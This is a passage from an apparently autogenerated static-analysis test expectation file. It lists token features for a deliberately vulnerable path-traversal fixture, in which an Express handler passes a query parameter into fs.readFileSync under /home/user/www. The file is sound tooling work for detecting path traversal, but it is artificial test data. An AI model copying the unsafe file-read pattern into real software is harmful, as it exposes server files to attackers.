return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:135:5:135:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:135:5:135:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:135:5:135:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:135:5:135:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:135:5:135:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:135:5:135:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:135:5:135:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:135:8:135:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:135:8:135:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:135:8:135:19 | readFileSync | enclosingFunctionBody | req res path pathModule join . req query path path startsWith .. fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:135:8:135:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:135:8:135:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:135:21:135:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:135:21:135:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:135:21:135:24 | path | calleeImports | fs | @@ -8265,6 +73044,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:135:21:135:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:135:21:135:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:135:21:135:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:138:1:138:3 | app | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:138:1:138:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:138:1:138:3 | app | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:138:1:138:7 | app.get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:138:1:138:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:138:1:138:7 | app.get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:138:1:145:2 | app.get ... T OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:138:1:145:2 | app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:138:1:145:2 | app.get ... T OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:138:1:145:2 | exceptional return of app.get ... T OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:138:1:145:2 | exceptional return of app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:138:1:145:2 | exceptional return of app.get ... T OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:138:5:138:7 | get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:138:5:138:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:138:5:138:7 | get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:138:9:138:26 | '/coerce-absolute' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:138:9:138:26 | '/coerce-absolute' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:138:9:138:26 | '/coerce-absolute' | calleeImports | express | @@ -8272,6 +73066,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:138:9:138:26 | '/coerce-absolute' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:138:9:138:26 | '/coerce-absolute' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:138:9:138:26 | '/coerce-absolute' | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:138:29:138:28 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:138:29:138:28 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:138:29:138:28 | fs | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:138:29:138:28 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:138:29:138:28 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:138:29:138:28 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:138:29:138:28 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:138:29:138:28 | pathModule | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:138:29:138:28 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:138:29:138:28 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:138:29:145:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:138:29:145:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:138:29:145:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:138:29:145:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:138:29:145:1 | 'arguments' object of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:138:29:145:1 | (req, r ... OT OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:138:29:145:1 | (req, r ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/normalizedPaths.js:138:29:145:1 | (req, r ... OT OK\\n} | calleeImports | express | @@ -8279,11 +73088,71 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:138:29:145:1 | (req, r ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:138:29:145:1 | (req, r ... OT OK\\n} | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:138:29:145:1 | (req, r ... OT OK\\n} | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:138:29:145:1 | exceptional return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:138:29:145:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:138:29:145:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:138:29:145:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:138:29:145:1 | exceptional return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:138:29:145:1 | return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:138:29:145:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:138:29:145:1 | return of anonymous function | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:138:29:145:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:138:29:145:1 | return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:138:30:138:32 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:138:30:138:32 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:138:30:138:32 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:138:30:138:32 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:138:30:138:32 | req | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:138:30:138:32 | req | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:138:30:138:32 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:138:30:138:32 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:138:30:138:32 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:138:30:138:32 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:138:35:138:37 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:138:35:138:37 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:138:35:138:37 | res | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:138:35:138:37 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:138:35:138:37 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:139:7:139:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:139:7:139:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:139:7:139:10 | path | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:139:7:139:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:139:7:139:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:139:7:139:62 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:139:7:139:62 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:139:7:139:62 | path | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:139:7:139:62 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:139:7:139:62 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:139:7:139:62 | path = ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:139:7:139:62 | path = ... y.path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:139:7:139:62 | path = ... y.path) | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:139:7:139:62 | path = ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:139:7:139:62 | path = ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:139:14:139:23 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:139:14:139:23 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:139:14:139:23 | pathModule | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:139:14:139:23 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:139:14:139:23 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:139:14:139:28 | pathModule.join | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:139:14:139:28 | pathModule.join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:139:14:139:28 | pathModule.join | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:139:14:139:28 | pathModule.join | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:139:14:139:28 | pathModule.join | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:139:14:139:62 | exceptional return of pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:139:14:139:62 | exceptional return of pathMod ... y.path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:139:14:139:62 | exceptional return of pathMod ... y.path) | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:139:14:139:62 | exceptional return of pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:139:14:139:62 | exceptional return of pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:139:14:139:62 | pathMod ... y.path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | | autogenerated/TaintedPath/normalizedPaths.js:139:14:139:62 | pathMod ... y.path) | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:139:14:139:62 | pathMod ... y.path) | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | | autogenerated/TaintedPath/normalizedPaths.js:139:14:139:62 | pathMod ... y.path) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:139:14:139:62 | pathMod ... y.path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:139:25:139:28 | join | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:139:25:139:28 | join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:139:25:139:28 | join | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:139:25:139:28 | join | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:139:25:139:28 | join | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:139:30:139:45 | '/home/user/www' | CalleeFlexibleAccessPath | pathModule.join | | autogenerated/TaintedPath/normalizedPaths.js:139:30:139:45 | '/home/user/www' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:139:30:139:45 | '/home/user/www' | calleeImports | path | @@ -8293,6 +73162,16 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:139:30:139:45 | '/home/user/www' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:139:30:139:45 | '/home/user/www' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:139:30:139:45 | '/home/user/www' | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:139:48:139:50 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:139:48:139:50 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:139:48:139:50 | req | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:139:48:139:50 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:139:48:139:50 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:139:48:139:56 | req.query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:139:48:139:56 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:139:48:139:56 | req.query | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:139:48:139:56 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:139:48:139:56 | req.query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:139:48:139:61 | req.query.path | CalleeFlexibleAccessPath | pathModule.join | | autogenerated/TaintedPath/normalizedPaths.js:139:48:139:61 | req.query.path | InputArgumentIndex | 1 | | autogenerated/TaintedPath/normalizedPaths.js:139:48:139:61 | req.query.path | calleeImports | path | @@ -8302,6 +73181,41 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:139:48:139:61 | req.query.path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:139:48:139:61 | req.query.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:139:48:139:61 | req.query.path | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:139:52:139:56 | query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:139:52:139:56 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:139:52:139:56 | query | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:139:52:139:56 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:139:52:139:56 | query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:139:58:139:61 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:139:58:139:61 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:139:58:139:61 | path | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:139:58:139:61 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:139:58:139:61 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:141:7:141:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:141:7:141:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:141:7:141:10 | path | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:141:7:141:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:141:7:141:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:141:7:141:21 | path.startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:141:7:141:21 | path.startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:141:7:141:21 | path.startsWith | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:141:7:141:21 | path.startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:141:7:141:21 | path.startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:141:7:141:39 | exceptional return of path.st ... r/www') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:141:7:141:39 | exceptional return of path.st ... r/www') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:141:7:141:39 | exceptional return of path.st ... r/www') | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:141:7:141:39 | exceptional return of path.st ... r/www') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:141:7:141:39 | exceptional return of path.st ... r/www') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:141:7:141:39 | path.st ... r/www') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:141:7:141:39 | path.st ... r/www') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:141:7:141:39 | path.st ... r/www') | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:141:7:141:39 | path.st ... r/www') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:141:7:141:39 | path.st ... r/www') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:141:12:141:21 | startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:141:12:141:21 | startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:141:12:141:21 | startsWith | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:141:12:141:21 | startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:141:12:141:21 | startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:141:23:141:38 | '/home/user/www' | CalleeFlexibleAccessPath | path.startsWith | | autogenerated/TaintedPath/normalizedPaths.js:141:23:141:38 | '/home/user/www' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:141:23:141:38 | '/home/user/www' | calleeImports | path | @@ -8311,6 +73225,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:141:23:141:38 | '/home/user/www' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:141:23:141:38 | '/home/user/www' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:141:23:141:38 | '/home/user/www' | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:142:5:142:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:142:5:142:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:142:5:142:6 | fs | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:142:5:142:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:142:5:142:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:142:5:142:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:142:5:142:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:142:5:142:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:142:5:142:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:142:5:142:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:142:5:142:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:142:5:142:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:142:5:142:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:142:5:142:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:142:5:142:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:142:5:142:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:142:5:142:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:142:5:142:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:142:5:142:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:142:5:142:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:142:8:142:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:142:8:142:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:142:8:142:19 | readFileSync | enclosingFunctionBody | req res path pathModule join /home/user/www req query path path startsWith /home/user/www fs readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:142:8:142:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:142:8:142:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | 